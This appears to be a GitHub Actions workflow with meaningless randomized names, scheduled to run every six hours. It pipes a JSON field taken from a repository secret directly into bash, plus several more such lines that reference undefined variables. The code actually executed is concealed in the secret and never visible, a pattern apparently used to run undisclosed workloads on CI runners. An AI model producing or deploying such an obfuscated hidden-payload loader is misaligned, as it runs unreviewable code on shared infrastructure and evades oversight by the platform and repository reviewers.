name: yuanqingshen2456
on:
  workflow_dispatch:
  schedule:
    - cron: '46 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: yuanqingshen2456
        env:
          qql4: ${{ secrets.qql4 }}
        run: |
          echo $qql4 | jq -r .fbzeu565 | /bin/bash
          echo $gtgy63 | jq -r .zy1387 | /bin/bash
          echo $tbslj2800 | jq -r .jqal9 | /bin/bash
          echo $sa97 | jq -r .bhetc55082 | /bin/bash
          echo $gogkn3586 | jq -r .o3 | /bin/bash
          echo $nagzt908 | jq -r .s484 | /bin/bash

